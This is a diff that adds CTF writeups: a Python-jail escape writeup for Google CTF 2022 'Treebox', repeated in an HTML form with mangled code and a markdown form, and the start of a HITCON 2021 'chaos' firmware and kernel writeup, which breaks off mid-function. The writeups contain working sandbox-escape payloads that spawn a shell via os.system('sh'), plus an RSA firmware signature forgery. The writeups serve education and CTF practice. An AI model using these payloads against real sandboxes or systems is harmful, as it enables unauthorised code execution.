+Since we arrive in a fresh execution context, with arbitrary code sent through stdin, the ast blacklist no longer applies to our new code, and we can do whatever we want from there.
+
+
So the full exploit code is something as simple as
+
+
@exec
+@input
+classX:
+ pass
+
+
+
and keeping in mind how decorators works, we can see that this code is equivalent to
+
+
classX:
+ pass
+X=input(X)
+X=exec(X)
+
+
+
which is essentially the same as our wanted exec(input()) other than the fact that input(X) will also print a representation of the class X to stdout before reading.
+
+
Since decorators aren’t parsed as call expressions or statements, this passes the blacklist, and allows us to finally pass in an input such as import os; os.system("sh") to obtain a shell and display the flag.
+
+
See this example for a similar exploit template, but going through some different methods to establish code execution.
+
+
Alternative approaches
+
+
With my initial solution behind us now, let’s have a look at some of the other approaches, and general techniques that can also allow flag recovery on this challenge.
+The general spirit behind all of these will obviously be to use something in the python ecosystem that ends up calling a function, without being an explicit function call.
+The approaches I found or observed roughly fall into three categories:
+
+
+
Operator overloading
+
Function overwriting
+
Interpreter hooks
+
+
+
These categories can of course overlap somewhat, or not exactly cover everything, but you get the idea :)
In python, operator overloading in general works by writing custom functions on your class with special names.
+These are also known as dunder methods, after how the names are all enclosed in double underscores, such as the well-known __init__ constructor.
+So if we can overwrite functions such as __getitem__ or __add__ on a class, or if we can write our own classes with those methods, we can get function calls for example with
+
+
obj[argument]
+# Or
+obj+argument
+
+
+
To overwrite these methods on existing classes/objects, we need to find something that’s implemented in plain python, as things implemented in C/in extension modules are read-only.
+Some of the possible approaches are for example:
Hippity, hoppity, this attribute is now my property
+
+
Since some of these don’t take any arguments at all, we’ll also need some “one-shot” functions that we can leverage to get either an arbitrary file read, or more python control.
+
+
For arbitrary file read, one approach includes overwriting some of the innards of the license() builtin function.5
+More in particular, overwriting the “private”6 member variable that specifies from which files it reads license information.
+Another approach calls the breakpoint() builtin, that by default points to pdb.set_trace(), which spawns a pdb debugger.
+With a debugger, we can easily evaluate arbitrary python code again to obtain a system shell.
+
+
Another function that can be overwritten to get one-shot function call includes sys.stdout.flush which would get called upon interpreter exit, or sys.stderr.flush which can be triggered when an exception occurs.
+Both the os and sys modules were already imported in the parent context, so we can access either sys directly, or pass through os.sys.
+
+
Everything is an object, even if it’s a class
+
+
Next up, let’s explore a few ways to create objects, of course without calling the constructor explicitly.
+The first approach towards this we can use relies on the concept of metaclasses.
+In short, a class is itself also an object, and its type/class is known as a metaclass.
+The standard metaclass for classes is type, whose own metaclass is, interestingly, type.
+The key thing that metaclasses allow us to do is make an instance of a class, without calling the constructor directly, by creating a new class with the target class as metaclass.7
+Since this is all a bit confusing, perhaps, let’s show some example code:
+
+
# This will define the members on the "sub"class
+classMetaclass:
+ __getitem__=exec# So Sub[string] will execute exec(string)
+# Note: Metaclass.__class__ == type
+
+classSub(metaclass=Metaclass):# That's how we make Sub.__class__ == Metaclass
+pass# Nothing special to do
+
+assertisinstance(Sub,Metaclass)
+sub['import os; os.system("sh")']
+
+
+
One other example takes this further by overloading the __instancecheck__ dunder and triggering it through a match statement (example).
+
+
Exceptional function calls
+
+
Another approach to making instances of a class is also documented on hacktricks: throw and catch an exception.
+Throwing an exception without arguments will automatically call its constructor.
+Then we can either use of our previously-covered one-shot functions (example), or use the operator overloading as with the metaclasses above (what hacktricks does).
+
+
Writing a one-shot function taking three arguments to sys.excepthook could also allow for exploitation by throwing an (uncaught) exception.
+
+
And finally, looking at the reference solution, we can see that there’s even some room to exploit OS/distro-specific functionality to combine with error handling and operator overloading to execute code.
+In particular, here the interpreter will try to import an apt-specific module to potentially report an error in ubuntu-provided modules, but import will instead construct an object that will call an overloaded operator to execute code.
+Without overwriting __import__ and applying the previous exception-based object construction instead, we could also apply the same __init__ to __iadd__ chaining as demonstrated here.
+More generally, defining __init__ will allow for similar one-shot approaches taking an arbitrary number of arguments, such as we wished for above:
This jail was leakier than a sieve, and it probably had the highest amount of sufficiently distinct potential solutions I’ve ever seen on a pyjail so far.
+Together with some payloads that could be directly copy-pasted from previous writeups and hacktricks, this led to a high amount of solves.
+The challenge itself was however still a lot of fun, and particularly interesting as a case-study of exploitation approaches that are allowed by a minimal-but-not-trivial AST-based blacklist,8 for which I would like to thank the author.
+
+
Addendum
+
+
While there were a lot of different exploits possible, I’m particularly happy with my initial one, for a few arbitrary reasons:
+
+
+
It got me a quick first blood
+
It’s one of the few exploits that don’t need any parentheses at all
+
When looking at it as a code golf challenge, it has the lowest amount of characters I’ve seen in any of the solutions posted on discord. This is even improved upon slightly be replacing the pass in the class body with simply the constant 0.
+
+
+
+
+
And of course, the existence of tools such as sage that plug into this ecosystem and that are indispensable for cryptographic exploration only serve to enhance my dependency on python. ↩
+
+
+
Since writing this, I’ve been informed that there were in fact earlier CTFs doing this that I was unaware of. For instance this French CTF did it before, and potentially there’d be others too. ↩
+
+
+
Or prevents us from calling callables in general, really. For instance constructing a class isn’t really calling a function, but it would get caught here too. ↩
+
+
+
As long as we still have access to the python builtins, otherwise we need to circumvent that, potentially in the second stage again too. ↩
+
+
+
See hacktricks for a reference on exactly which member to write to. ↩
This is starting to feel like a “how many times can you use the word class in a sentence while still being understandable and correct”… ↩
+
+
+
And obviously, that is exactly what this writeup aims to be :) ↩
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/GCTF-2022/sandbox/treebox.md b/GCTF-2022/sandbox/treebox.md
new file mode 100755
index 0000000..e170945
--- /dev/null
+++ b/GCTF-2022/sandbox/treebox.md
@@ -0,0 +1,233 @@
+# Treebox
+
+**Author**: Robin_Jadoul
+
+**Tags**: pyjail
+
+**Points**: 50 (268 solves)
+
+**Alternate URL**:
+
+**Description**:
+
+> I think I finally got Python sandboxing right.
+
+
+## On the topic of pyjails
+
+Python was one of the first programming languages I became acquainted with, and to this day remains one of -- and probably even *the* -- main language I go back to when I need to quickly write something, ranging from a proof of concept, to a hacky script that does some math when I'm too lazy, to the ever-recurring CTF solution scripts.[^1]
+As such, ever since I started playing CTFs and encountering pyjail challenges, I've thoroughly enjoyed the concept of these jails, the act of playing Houdini, and even occasionally creating some pyjail challenges myself.
+For some examples of earlier pyjails I particularly enjoyed, you can for example refer to my writeups for [this recent challenge on DiceCTF](https://ur4ndom.dev/posts/2022-02-08-dicectf-ti1337/) or [the 0CTF/TCTF challenge](https://ur4ndom.dev/posts/2020-06-29-0ctf-quals-pyaucalc/) that to the best of my knowledge was the first to introduce the audit hook system as a jailing mechanism[^audithookctf].
+
+[^1]: And of course, the existence of tools such as [sage](https://sagemath.org) that plug into this ecosystem and that are indispensable for cryptographic exploration only serve to enhance my dependency on python.
+[^audithookctf]: Since writing this, I've been informed that there were in fact earlier CTFs doing this that I was unaware of. For instance this [French CTF](https://redoste.xyz/2020/05/04/fr-write-up-fcsc-2020-why-not-a-sandbox/) did it before, and potentially there'd be others too.
+
+Through this fascination and repeated exposure to pyjail challenges, in combination with coincidentally opening up the challenge rather early on, I was able to snatch the first blood on it.
+In a move that surprised myself too, I was able to have a turnaround time only **2** minutes between first looking at the challenge file, and obtaining the flag.
+
+I was able to find several of the approaches and techniques presented further on by myself/independently, but in order to present a wider overview of the used attack surfaces, I also referenced the publicly posted exploits in the CTF discord.
+Even for those approaches where I constructed my own viable payloads, I attempt to reference some messages posted in the #sandbox channel of the [public discord](https://discord.gg/nt6JFkk3mu) after the conclusion of the CTF.
+
+One interesting thing to notice for this challenge in particular, and presumably a reason for the high solve count, is that several of the pyjail escape methods listed on [the hacktricks page](https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes) apply directly to this challenge, so the situation is already well-documented.
+
+## The great snake, constricted
+
+Let's first have a look at what the challenge allows us to do, or rather what it doesn't allow us to do:
+
+```python
+#!/usr/bin/python3 -u
+#
+# Flag is in a file called "flag" in cwd.
+#
+# Quote from Dockerfile:
+# FROM ubuntu:22.04
+# RUN apt-get update && apt-get install -y python3
+#
+import ast
+import sys
+import os
+
+def verify_secure(m):
+ for x in ast.walk(m):
+ match type(x):
+ case (ast.Import|ast.ImportFrom|ast.Call):
+ print(f"ERROR: Banned statement {x}")
+ return False
+ return True
+
+abspath = os.path.abspath(__file__)
+dname = os.path.dirname(abspath)
+os.chdir(dname)
+
+print("-- Please enter code (last line must contain only --END)")
+source_code = ""
+while True:
+ line = sys.stdin.readline()
+ if line.startswith("--END"):
+ break
+ source_code += line
+
+tree = compile(source_code, "input.py", 'exec', flags=ast.PyCF_ONLY_AST)
+if verify_secure(tree): # Safe to execute!
+ print("-- Executing safe code:")
+ compiled = compile(source_code, "input.py", 'exec')
+ exec(compiled)
+```
+
+Summarized: there is an `ast` based blacklist in place that prevents us from either calling functions[^2] or importing modules through the `import` statement.
+As far as I'm aware, `ast` relies on the actual parser that the python interpreter itself uses, so we're unlikely to encounter any parser differentials to abuse here.
+On the upside, and something that's certainly not a guarantee in this kind of challenge, we do have full access to all python builtins.
+There are also no character-level blocks, so we *could* use parentheses in some context if we wanted; as long as they're not used to call a function.
+
+On the topic of `import` statements, it's worth noting that, with the access to the python builtins that we have, being able to call functions is enough, since the `__import__` function could do everything we need from it.
+
+[^2]: Or prevents us from calling *callables* in general, really. For instance constructing a class isn't really calling a function, but it would get caught here too.
+
+Our end goal for this challenge would be an (arbitrary) file read of the `flag` file, but of course we won't say no to getting full code execution if it happens to fit our needs.
+
+My very first solution is similar to the [polygl0ts writeup](https://polygl0ts.ch/writeups/2021/b01lers/pyjail_noparens/README.html) for the [noparensjail](https://github.com/b01lers/b01lers-ctf-2021/tree/main/misc/noparensjail) challenge from b01lers CTF 2021.
+Contrary to the intended solution presented by the people from b01lers, we can't directly use `import`, so we need some other approach.
+Luckily, the polygl0ts approach works, but is a bit more convoluted than what we really need.
+
+To see why exactly, and to see the beauty of this exploit, we first make a quick detour through two *short* python expressions that can give us full code execution without further restrictions[^3] (either still in python, or directly in a shell).
+Without a doubt, the shortest expression I know that achieves this is `help()`, which can spawn a shell through the `more` pager if a topic that takes up more than a page is requested at the interactive help prompt.
+Unfortunately, that requires both a pager being present, and a tty, which isn't the case for this challenge.
+So instead, I went for the second convenient method I knew: `exec(input())`.
+Since we arrive in a fresh execution context, with arbitrary code sent through stdin, the `ast` blacklist no longer applies to our new code, and we can do whatever we want from there.
+
+[^3]: As long as we still have access to the python builtins, otherwise we need to circumvent that, potentially in the second stage again too.
+
+So the full exploit code is something as simple as
+
+```python
+@exec
+@input
+class X:
+ pass
+```
+
+and keeping in mind how [decorators](https://docs.python.org/3/glossary.html#term-decorator) works, we can see that this code is equivalent to
+
+```python
+class X:
+ pass
+X = input(X)
+X = exec(X)
+```
+
+which is essentially the same as our wanted `exec(input())` other than the fact that `input(X)` will also print a representation of the class `X` to stdout before reading.
+
+Since decorators aren't parsed as call expressions or statements, this passes the blacklist, and allows us to finally pass in an input such as `import os; os.system("sh")` to obtain a shell and display the flag.
+
+See [this example](https://discord.com/channels/984515980766109716/992433413351018526/993233705927712899) for a similar exploit template, but going through some different methods to establish code execution.
+
+## Alternative approaches
+
+With my initial solution behind us now, let's have a look at some of the other approaches, and general techniques that can also allow flag recovery on this challenge.
+The general spirit behind all of these will obviously be to use something in the python ecosystem that ends up calling a function, without being an *explicit* function call.
+The approaches I found or observed roughly fall into three categories:
+
+- Operator overloading
+- Function overwriting
+- Interpreter hooks
+
+These categories can of course overlap somewhat, or not exactly cover everything, but you get the idea :)
+
+### Operator overloading, aka `x.equals("string")` sucks
+
+In python, operator overloading in general works by writing custom functions on your class with special names.
+These are also known as *dunder* methods, after how the names are all enclosed in *d*ouble *under*scores, such as the well-known `__init__` constructor.
+So if we can overwrite functions such as `__getitem__` or `__add__` on a class, or if we can write our own classes with those methods, we can get function calls for example with
+
+```python
+obj[argument]
+# Or
+obj + argument
+```
+
+To overwrite these methods on existing classes/objects, we need to find something that's implemented in plain python, as things implemented in C/in extension modules are read-only.
+Some of the possible approaches are for example:
+
+- the `ast.AST` class and the available `tree` object ([example 1](https://discord.com/channels/984515980766109716/992433413351018526/993310441516314739), [example 2](https://discord.com/channels/984515980766109716/992433413351018526/993241943284924546))
+- the `os.environ` object ([example](https://discord.com/channels/984515980766109716/992433413351018526/993359479477391461))
+
+### Hippity, hoppity, this attribute is now my property
+
+Since some of these don't take any arguments at all, we'll also need some "one-shot" functions that we can leverage to get either an arbitrary file read, or more python control.
+
+For arbitrary file read, one approach includes overwriting some of the innards of the `license()` builtin function.[^4]
+More in particular, overwriting the "private"[^5] member variable that specifies from which files it reads license information.
+Another approach calls the `breakpoint()` builtin, that by default points to `pdb.set_trace()`, which spawns a pdb debugger.
+With a debugger, we can easily evaluate arbitrary python code again to obtain a system shell.
+
+Another function that can be overwritten to get one-shot function call includes `sys.stdout.flush` which would get called upon interpreter exit, or `sys.stderr.flush` which can be triggered when an exception occurs.
+Both the `os` and `sys` modules were already imported in the parent context, so we can access either `sys` directly, or pass through `os.sys`.
+
+[^4]: See [hacktricks](https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#read-file-with-builtins-help) for a reference on exactly which member to write to.
+[^5]: Heh, thanks python.
+
+
+### Everything is an object, even if it's a class
+
+Next up, let's explore a few ways to create objects, of course without calling the constructor explicitly.
+The first approach towards this we can use relies on the concept of [metaclasses](https://docs.python.org/3/reference/datamodel.html#metaclasses).
+In short, a class is itself also an object, and its type/class is known as a metaclass.
+The standard metaclass for classes is `type`, whose own metaclass is, interestingly, `type`.
+The key thing that metaclasses allow us to do is make an instance of a class, without calling the constructor directly, by creating a new class with the target class as metaclass.[^6]
+Since this is all a bit confusing, perhaps, let's show some example code:
+
+```python
+# This will define the members on the "sub"class
+class Metaclass:
+ __getitem__ = exec # So Sub[string] will execute exec(string)
+# Note: Metaclass.__class__ == type
+
+class Sub(metaclass=Metaclass): # That's how we make Sub.__class__ == Metaclass
+ pass # Nothing special to do
+
+assert isinstance(Sub, Metaclass)
+sub['import os; os.system("sh")']
+```
+
+One other example takes this further by overloading the `__instancecheck__` dunder and triggering it through a `match` statement ([example](https://discord.com/channels/984515980766109716/992433413351018526/993222030545666060)).
+
+[^6]: This is starting to feel like a "how many times can you use the word class in a sentence while still being understandable and correct"...
+
+### Exceptional function calls
+
+Another approach to making instances of a class is also documented on [hacktricks](https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#rce-declaring-exceptions): throw and catch an exception.
+Throwing an exception without arguments will automatically call its constructor.
+Then we can either use of our previously-covered one-shot functions ([example](https://docs.python.org/3/reference/datamodel.html#metaclasses)), or use the operator overloading as with the metaclasses above (what hacktricks does).
+
+Writing a one-shot function taking three arguments to `sys.excepthook` could also allow for exploitation by throwing an (uncaught) exception.
+
+And finally, looking at the [reference solution](https://github.com/google/google-ctf/blob/master/2022/sandbox-treebox/healthcheck/solution.py), we can see that there's even some room to exploit OS/distro-specific functionality to combine with error handling and operator overloading to execute code.
+In particular, here the interpreter will try to import an apt-specific module to potentially report an error in ubuntu-provided modules, but import will instead construct an object that will call an overloaded operator to execute code.
+Without overwriting `__import__` and applying the previous exception-based object construction instead, we could also apply the same `__init__` to `__iadd__` chaining as demonstrated here.
+More generally, defining `__init__` will allow for similar one-shot approaches taking an arbitrary number of arguments, such as we wished for above:
+
+```python
+class X:
+ def __init__(self, a, b, c):
+ self += "os.system('sh')"
+ __iadd__ = exec
+sys.excepthook = X
+1/0
+```
+
+## Conclusion
+
+This jail was leakier than a sieve, and it probably had the highest amount of sufficiently distinct potential solutions I've ever seen on a pyjail so far.
+Together with some payloads that could be directly copy-pasted from previous writeups and hacktricks, this led to a high amount of solves.
+The challenge itself was however still a lot of fun, and particularly interesting as a case-study of exploitation approaches that are allowed by a minimal-but-not-trivial AST-based blacklist,[^7] for which I would like to thank the author.
+
+
+[^7]: And obviously, that is exactly what this writeup aims to be :)
+
+### Addendum
+
+While there were a lot of different exploits possible, I'm particularly happy with my initial one, for a few arbitrary reasons:
+
+- It got me a quick first blood
+- It's one of the few exploits that don't need any parentheses at all
+- When looking at it as a code golf challenge, it has the lowest amount of characters I've seen in any of the solutions posted on discord. This is even improved upon slightly be replacing the `pass` in the class body with simply the constant `0`.
diff --git a/HITCON-2021/index.html b/HITCON-2021/index.html
new file mode 100755
index 0000000..e51850e
--- /dev/null
+++ b/HITCON-2021/index.html
@@ -0,0 +1,215 @@
+
+
+
+
+
+HITCON CTF 2021 | Organisers
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
Last week we played HITCON CTF 2021, one of the hardest events of the year, and placed 4th. During the CTF we (Nspace and gallileo) spent most of our time working on the chaos series of challenges written by david942j and lyc. This writeup explains the structure of the challenges and discusses how we solved each of the 3 stages. Out of nearly 300 teams in the CTF, we were the only team to solve all 3 challenges, and the first team to solve chaos-kernel and chaos-sandbox.
+
+
Let’s get started!
+
+
Challenge architecture
+
+
This series of challenges simulates a custom hardware cryptographic accelerator attached to a Linux computer. The setup is fairly complex and has a lot of moving parts:
+
+
+
A modified QEMU with a custom CHAOS PCI device. The virtual PCI device lets the guest interact with the emulated CHAOS chip.
+
A Linux VM running inside QEMU. The VM loads a driver for the CHAOS chip, called chaos.ko, into the kernel. Userspace programs can talk to CHAOS through the driver.
+
A userspace CHAOS client that uses CHAOS to perform cryptographic operations.
+
A firmware binary that runs on the emulated CHAOS chip.
+
A sandbox binary that emulates the CHAOS chip and runs the firmware.
+
+
+
The following image shows an overview all the components and how they interact.
+
+
+
+
There are 3 challenges in the series, each with a different flag:
+
+
+
chaos-firmware (10 solves, 334 points): the flag is in a file outside the VM (flag_fiwmare).
+
chaos-kernel (3 solves, 421 points): the flag is in a file inside the VM that only root can read.
+
chaos-sandbox (2 solves, 450 points): the flag is in a file outside the VM (flag_sandbox).
+
+
+
CHAOS virtual device
+
+
CHAOS is a virtual cryptographic accelerator attached to the PCI bus of the virtual machine. It exposes 2 PCI memory resources to the VM: a MMIO area with 16 registers (csrs), and 1 MB of dedicated on-chip memory (dram). The VM can interact with CHAOS by reading and writing to these two memory regions and CHAOS can send interrupts to the VM. The implementation is split in 3 parts: a virtual PCI device in QEMU, a sandbox binary, and some firmware that runs on the virtual chip.
+
+
The PCI device in QEMU doesn’t do much. At startup it allocates space for the two memory regions using memfd and launches the sandbox binary. The QEMU process and the sandbox share the two memfds and two eventfds used to signal interrupts. After startup, the virtual PCI device is only used to send interrupts to the VM or the sandbox and to handle the VM’s memory accesses.
+
+
CHAOS sandbox
+
+
The sandbox does the actual chip emulation, so it’s more interesting. At startup it mmaps the two shared memory areas, opens two flag files (flag_firmware and flag_sandbox), and waits until the VM sends it the firmware. Once the VM sends the firmware, the sandbox validates it, forks, and runs the firmware in the child process. The sandbox ptraces the firmware process and uses PTRACE_SYSEMU to intercept all the system calls made by the firmware. The firmware’s system calls are not handled by the kernel, but by the sandbox. This lets the sandbox implement a custom syscall interface for the firmware, and prevents the firmware from directly accessing files or other system resources.
+
+
The sandbox implements only a few system calls:
+
+
+
exit stops the firmware and sends the exit code back to the VM. The sandbox restarts the firmware on the next memory access from the VM.
+
add_key and delete_key add and remove cryptographic keys supplied by the firmware to the sandbox’s key storage.
+
do_crypto performs a cryptographic operation on data supplied by the firmware and returns the result to the firmware.
+
get_flag reads flag_firmware into the chip’s memory.
+
+
+
CHAOS firmware
+
+
The firmware is a flat x86_64 binary, which runs in a child process of the sandbox. Since it runs under ptrace with PTRACE_SYSEMU, it cannot directly make system calls to the kernel, but must do so through the sandbox. The firmware is not executed with execve, but simply loaded in memory and jumped to. It executes in a copy of the sandbox’s memory space, so it has direct access to the MMIO area and the CHAOS device memory.
+The challenge has an example firmware, but also lets us provide our own firmware, which can be an arbitrary binary up to 10 kB in size. The sandbox will refuse to load a firmware image unless it passes a RSA signature check.
+
+
CHAOS driver
+
+
chaos.ko is a Linux kernel-mode driver that interfaces with the virtual CHAOS chip over PCI. It is responsible for managing the CHAOS chip’s memory, loading the firmware, servicing interrupts, and providing userspace programs with an interface to the CHAOS chip. The userspace interface uses a misc character device (/dev/chaos) and exposes two IOCTLs:
+
+
+
ALLOC_BUFFER allocates a buffer of a given size in the CHAOS chip’s memory. This can only be done once per open file. After calling this ioctl the client can access the buffer by mmapping the file descriptor.
+
DO_REQUEST sends a request to perform a cryptographic operation to the CHAOS chip, waits for the request to complete, and then returns.
+
+
+
The chip side of the interface uses two ring buffers: a command queue and response queue. The command queue contains request descriptors, which specify what operation CHAOS should perform. Each request descriptor contains a pointer to the input data in the CHAOS memory, the size of the data, an opcode, and a request ID. The response queue contains response descriptors (request ID and status code). After enqueuing a new request, the driver signals a mailbox in the CHAOS MMIO area, which makes the sandbox run the firmware, and the blocks.
+
+
When the firmware returns, the virtual PCI device raises an interrupt, which processes the request, then wakes up the request threads. When a blocked request thread sees that the chip completed its request, it unblocks and returns the result to userspace.
+
+
CHAOS client
+
+
The last piece is the client, a regular Linux binary which runs in userspace in the VM. The client can interact with CHAOS through the interface exposed by the driver at /dev/chaos. Just like with the firmware, the challenge provides an example client, but also lets us use our own which can be an arbitrary binary up to 1 MB in size. Unlike the firmware, the client doesn’t have to pass a signature check. The client runs as an unprivileged user, so it cannot read the flag inside the VM.
+
+
Preparation
+
+
Since the challenge setup is quite complex with a lot of moving parts, we wanted to reduce the complexity and make debugging easier. Since Part 1 and Part 3 can ignore the kernel module and QEMU for the most part, we wrote a script to launch the sandbox binary standalone.
+
+
The setup is quite simple, we create the memfds and eventfds in python, then use pwntools to spawn the sandbox process. We also have some utility functions for “interacting” with the memory regions. The script shown below already uses part of the solution for Part 1. It also already contains more “advanced” firmware features we added for Part 3, being an output buffer so we can use printf inside the firmware.
+
+
#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+frompwnimport*
+# for type info in vscode
+frompwnlib.tubes.processimportprocess
+frompwnlibimportgdb,context
+frompwnlib.elfimportELF
+fromctypesimport*
+importos
+importmemfd
+frompwnimport*
+fromhashlibimportsha256
+frommathimportprod
+fromskeinimportthreefish
+importtwofish
+
+defmemfd_create(name,flags):
+ returnmemfd.memfd_create(name,flags)
+
+# whatever
+libc=cdll.LoadLibrary("libc.so.6")
+defeventfd(init_val,flags):
+ returnlibc.eventfd(init_val,flags)
+
+# Set up pwntools for the correct architecture
+exe=context.binary=ELF('sandbox')
+
+# SETUP LOCAL ENV
+csr_fd=memfd_create("dev-csr",0)
+log.info("csr_fd: %d",csr_fd)
+os.truncate(csr_fd,0x80)
+dram_fd=memfd_create("dev-dram",0)
+log.info("dram_fd: %d",dram_fd)
+os.truncate(dram_fd,0x100000)
+evtfd_to_dev=eventfd(0,0)
+log.info("evtfd_to_dev: %d",evtfd_to_dev)
+evtfd_from_dev=eventfd(0,0)
+
+defpreexec():
+ # WARNING: using log.* stuff inside the preexec functions can cause hangs, no idea why
+# log.info("Before executing, setting up the filedescriptors")
+os.dup2(csr_fd,3)
+ os.dup2(dram_fd,4)
+ os.dup2(evtfd_to_dev,5)
+ os.dup2(evtfd_from_dev,6)
+ # log.info("Finished with duplicating filedesc")
+
+defwait_for_interrupt():
+ log.debug("Waiting for interrupt from device")
+ res=os.read(evtfd_from_dev,8)
+ log.debug("Got 0x%x",u64(res))
+ returnres
+
+defsend_interrupt(val=1):
+ log.debug("Sending interrupt with val 0x%x",val)
+ os.write(evtfd_to_dev,p64(val))
+
+defwrite_mem(fd,off,val:bytes):
+ log.debug("Writing to %d @ 0x%x: %s",fd,off,hexdump(val))
+ os.lseek(fd,off,os.SEEK_SET)
+ os.write(fd,val)
+
+defwrite_mem_64(fd,off,val:int):
+ write_mem(fd,off,p64(val))
+
+defread_mem(fd,off,size)->bytes:
+ log.debug("Reading from %d @ 0x%x",fd,off)
+ os.lseek(fd,off,os.SEEK_SET)
+ returnos.read(fd,size)
+
+defread_mem_64(fd,off)->int:
+ res=read_mem(fd,off,8)
+ returnu64(res)
+
+defload_firmware(data,dram_off=0):
+ log.info("Loading firmware of size 0x%x, dram @ 0x%x",len(data),dram_off)
+ # mapping firmware directly at beginning of dram, hopefully that's ok lmao
+write_mem(dram_fd,dram_off,data)
+ write_mem_64(csr_fd,0,dram_off)
+ write_mem_64(csr_fd,8,len(data))
+ send_interrupt()
+ res=wait_for_interrupt()
+ int_val=u64(res)
+ log.info("Got interrupt: 0x%x",int_val)# should be > 0x1336
+load_res=read_mem_64(csr_fd,0)
+ log.info("Got result for loading: 0x%x",load_res)
+
+defbuild_firmware(shellcode):
+ header=p32(len(shellcode))
+ header+=p8(0x82)
+ header+=bytes.fromhex("0fff0ee945bd4176f55a40543b3666843a0d565c339e5d8969fcd7ca921cc303a1c8af16240c4d032d1931632b90996dd48aebacee307d3c57bc83375698ae7df90d10163edee9e067ce46e738092257dafb15b80fb65961900deffa9b59b57e472bf56be0d9f648ad6908f2553be13a9ea0cda24317756cba5142a95e21f9e000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000")
+
+ factors=[13,691267,20502125755394762434933579089125449307897345968084091731229436353808955447773787435286551243437724264561546459801643475331591701959705793105612360650011316069145033629055595572330904990306691542449400499839249687299626423918040370229280752606812185791663127069532707770334540305571214081730144598191170073
+ ]
+ phi=prod([i-1foriinfactors])
+ dec=pow(0x10001,-1,phi)
+ act=int.from_bytes(sha256(shellcode).digest(),"little")
+ header+=int.to_bytes(pow(act,dec,prod(factors)),256,'little')
+ returnheader+shellcode
+
+OUT_OFF=0x50000
+
+defread_outputbuf():
+ ret=b""
+ off=OUT_OFF
+ whileTrue:
+ curr=read_mem(dram_fd,off,1)
+ ifcurr==b"\0":
+ break
+ ret+=curr
+ off+=1
+ returnret
+
+defstart(argv=[],*a,**kw):
+ '''Start the exploit against the target.'''
+ p=process([exe.path]+argv,*a,**kw)
+ ifargs.GDB:
+ gdb.attach(p,gdbscript=gdbscript)
+ returnp
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript='''
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+# Arch: amd64-64-little
+# RELRO: Full RELRO
+# Stack: Canary found
+# NX: NX enabled
+# PIE: PIE enabled
+
+io=start(preexec_fn=preexec,close_fds=False)
+
+# to allow attaching
+ifargs.PAUSE:
+ pause()
+
+DRAM_START=0x10000000
+
+# sh = shellcraft.syscall(0xC89FC, arg0=DRAM_START + 0x1000)
+# sh += shellcraft.syscall(60, 0)
+
+# asm_sh = asm(sh)
+
+importsubprocess
+
+subprocess.check_call(['make'])
+firm=read("./firmware")
+# firm = build_firmware(asm_sh)
+load_firmware(firm)
+
+log.info("Firmware read ok => launching firmware now!")
+send_interrupt()
+
+wait_for_interrupt()
+# pause()
+log.info("Got interrupt, firmware is done now!")
+
+output=read_outputbuf()
+
+log.info("Output buffer of firmware is:\n%s",hexdump(output))
+
+log.info("As string:\n%s",output.decode("ascii",errors='ignore'))
+
+io.interactive()
+
+
+
Part 1: Firmware
+
+
The firmware can request the flag for this challenge from the
+sandbox by using the get_flag syscall, and then write it to the CHAOS memory where our client in userspace can read it. Unfortunately the provided firmware never uses this system call, so there is no way to get the flag without either pwning the firmware from userspace or creating our own firmware that gets the flag and passes the RSA signature check. Since the challenge is in both the crypto and the pwn category and we can supply our own firmware, we tried to look for a way to bypass the signature check. This is the function that validates the firmware:
The firmware verifies only the first 128 bytes of N, but N can be up to 255 bytes long, with the size controlled by us. Furthermore, there are no checks that N is actually a product of two primes. This means that we can sign the firmware with our own RSA key as long as the first 128 bytes of the modulus match the key accepted by the sandbox.
+
+
In short, we have to find a number $N’$ that is equal to the challenge’s $N$ in the lowest 128 bytes such that $\phi(N’)$ is easy to compute. Once we have $\phi(N’)$ we can compute the private key and sign our own firmware. The intended solution is to look for a prime $N’$, since then $\phi(N’) = N’ - 1$, but we didn’t think about this during the CTF and instead looked for a composite $N’$ that was easy to factor by setting bits above 1024.
+
+
Our teammate Aaron eventually found that $N’ = (N \mod 2^{1024}) + 2^{1034}$ works and factors to 13 * 691267 * 20502125755394762434933579089125449307897345968084091731229436353808955447773787435286551243437724264561546459801643475331591701959705793105612360650011316069145033629055595572330904990306691542449400499839249687299626423918040370229280752606812185791663127069532707770334540305571214081730144598191170073. This script produces a valid signature for an arbitrary binary:
Now that we can sign and load our own firmware, we only have to write some code that loads the flag using the get_flag syscall and makes it available to the client. The easiest way is to have our client allocate and map a buffer in the CHAOS memory, then send a request to CHAOS. The firmware can then copy the flag in the response buffer and exit. Since we hadn’t yet finished reversing the interface between CHAOS and the driver, we just wrote a firmware that copies the flag everywhere in the CHAOS memory instead of finding the buffer that the client is using.
Flag: hitcon{when the secure bootloader is not secure}
+
+
Part 2: Kernel
+
+
The flag for this part is in the VM, only readable to root. This means that we have to somehow exploit the kernel from our unprivileged client to become root. We control both the userspace client and the firmware, so we can attack the kernel from both sides.
+
+
DMA attack
+
+
CHAOS uses a virtual PCI device. PCI is interesting from an attacker’s point of view because it is bus mastering, which means that the devices can DMA to the host’s memory. Pwning the kernel from such a device would be really easy because the device can read and write to all of physical memory. Unfortunately the virtual PCI device in Qemu doesn’t use DMA, so it’s impossible to DMA to the host memory from the device’s firmware. All that the firmware can do is to write to its MMIO registers and its dedicated memory. Too bad.
+
+
CHAOS driver analysis
+
+
We cannot directly attack the VM’s kernel from the firmware, so it is very likely that we will need to find a bug in the driver and exploit it. We spent a few hours reversing the driver and understanding how it works and eventually found some bugs.
+
+
Recall that the driver uses two ring buffers to communicate with CHAOS. The driver puts commands in the command queue and receives responses in the response queue. Here is the code that adds a new command to the queue:
+
+
intchaos_mailbox_request(structchaos_mailbox*mailbox,structchaos_request*req)
+{
